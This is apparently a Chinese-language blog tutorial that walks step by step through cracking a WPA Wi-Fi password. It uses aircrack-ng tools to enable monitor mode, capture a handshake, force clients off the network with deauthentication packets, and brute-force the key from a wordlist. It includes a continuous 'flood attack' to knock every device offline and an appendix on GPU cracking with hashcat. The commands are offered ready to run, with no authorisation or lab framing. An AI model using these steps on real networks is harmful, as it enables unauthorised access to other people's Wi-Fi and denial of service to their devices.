1、关闭网络和会影响到破解的进程
service net-manager stop
关闭网络功能-
airmon-ng check kill
关闭相关进程
2、打开网络监听
iwconfig
命令查看本机的网卡,可以看到无线网卡wlan0airmon-ng
命令列出支持监控模式的无线网卡,如没有输出,则表示本机无线网卡不支持监控模式。-
airmon-ng start wlan0
打开网络监听,wlan0为你的无线网卡名称。如果有报错Operation not possible due to RF-kill
,则手动关掉wifid的soft blocked,rfkill list
,rfkill unblock 2
。 airodump-ng wlan0mon
监听所有wifi, wlan0mon 也可能是mon0,并记录BSSID, CH, ESSID, 考虑data列有数据的WIFI。BSSID是路由器的MAC地址,CH路由器WIFI频道,ESSID为WIFI的名字,窗口1。airodump-ng --bssid xx:xx:xx:xx:xx:xx -c 1 -w ~/Desktop/cap/xxx.cap wlan0mon
监听特定的频道,不要结束此进程,不要关掉此窗口,窗口2。aireplay-ng -0 2 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx wlan0mon
获取握手包数据,新开一个终端执行,当上一步时间后面出现WAP handshake时说明获取成功。需要多尝试几次 ,窗口3。 或者aireplay-ng -0 0 -a 28:6C:07:53:53:80 wlam0mon
进行洪水攻击,不断攻击,让所有设备下线。aircrack-ng -w 1.txt tmp-02.cap
硬破解密码,1.txt是密码包,temp-02.cap是握手包。会执行很长时间,直到提示key fund!窗口4airmon-ng stop wlan0mon
关闭网络监听。service network-manager start
打开网络。
3、附录:
1、使用显卡的运算能力
如果你有一个强大的GPU,为什么不使用GPU跑字典呢?
Hashcat可以借助GPU的运算力破解各种不同算法的hash值。
下载时要注意选择正确的显卡类型(AMD、NVidia)。Kali Linux自带这个工具。
在破解cap文件之前,要把它转换为hccap文件:
aircrack-ng file.cap -J out.hccap
使用GPU破解hash:
hashcat -m 2500 out.hccap 字典文件
2、参考链接:
https://blog.csdn.net/GrayOnDream/article/details/51859688?locationNum=13
https://blog.csdn.net/qq_37367124/article/details/79587713
https://www.cnblogs.com/daoyi/p/Kali-Linux-shi-yongAircrack-po-jiewifi-mi-ma-wpawp.html
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 lxwno.1@163.com